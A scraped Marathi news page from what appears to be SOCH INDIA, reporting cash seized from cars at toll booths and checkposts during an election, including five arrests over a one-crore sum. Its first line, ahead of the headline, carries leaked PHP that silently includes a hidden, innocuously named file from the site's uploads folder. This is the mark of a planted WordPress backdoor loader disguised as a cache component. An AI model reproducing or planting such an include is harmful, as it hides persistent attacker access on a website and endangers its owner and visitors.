add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); कारमध्ये चार कोटी रुपये आढळले! – SOCH INDIA
Menu

देश
कारमध्ये चार कोटी रुपये आढळले!

nobanner

– चौकशीनंतर परत : एक कोटी प्रकरणी पाच जणांना अटक

निपाणी (जि. बेळगाव) : कोल्हापूरहून गडहिंग्लजकडे जाणार्‍या कारमधून शुक्रवारी सायंकाळी कोगनोळी टोलनाक्यावर चार कोटींची रक्कम आढळली. निवडणूक अधिकार्‍यांनी सुमारे तासभर रक्कम आणि संबंधित कागदपत्रांची चौकशी करून ती रक्कम त्यांना परत दिल्याची माहिती निवडणूक अधिकारी के. सी. धाडेकर यांनी दिली. दरम्यान, गुरुवारी आप्पाचीवाडी फाट्यावरील चेकपोस्टवर ताब्यात घेतलेल्या एक कोटी रुपयाच्या रकमेप्रकरणी रवींद्र यशवंत मोरे ,आकाश प्रकाश चव्हाण, महेश सुनील सुतार , प्रदीप रंगराव देवडकर आणि कृष्णात यशवंत पाटील यांना अटक करुन गुन्हा दाखल करण्यात आला आहे. गुन्हा दाखल करून हे प्रकरण न्यायालयाकडे वर्ग केल्याचे मंडल पोलीस निरीक्षक महेश्‍वर गौडा यांनी सांगितले.
कोल्हापूर येथील कृषी उत्पन्न बाजार समितीत शुक्रवारी दिवसभर झालेल्या व्यवहाराची रक्कम घेऊन बाजार समितीचे अधिकारी व कर्मचारी कारने गडहिंग्लज शाखेकडे जात होते. (प्रतिनिधी)

अंकली टोलनाक्यावर नऊ लाख जप्त
सांगली-कोल्हापूर महामार्गावरील अंकली टोलनाक्याजवळ झायलो कारमध्ये नऊ लाखांची रोकड भरारी पथकाला मिळून आली. बेदाणा व्यापार्‍याने शेतकर्‍यांना पैसे देण्यासाठी कवठेमहांकाळ येथील आयसीआयसीआय बॅँकेतून रक्कम काढल्याचे चालकाने सांगितले असले तरी रात्री उशिरापर्यंत या माहितीत तथ्य आहे का, याची शहानिशा करण्याचे काम अधिकार्‍यांकडून सुरू होते.
साडेपाच लाखांची रोकड जप्त
पोलीस औटपोस्टसमोर वाहनांची तपासणी सुरू असताना इनोव्हा गाडीतील दोन चप्पल व्यापार्‍यांकडून पाच लाख ४३ हजार ८२0 रुपयांची रोकड आजरा पोलिसांनी ताब्यात घेतली. दुपारी साडेचारच्या सुमारास ही कारवाई करण्यात आली. ही रक्कम आजरा तहसीलदारांतर्फे कोषागारमध्ये जमा करण्यात आली आहे. रकमेची शहानिशा करण्यासाठी प्राप्तीकर विभागाच्या अधिकार्‍यांना उद्या (शनिवार) बोलविण्यात आल्याचे पोलिसांनी सांगितले.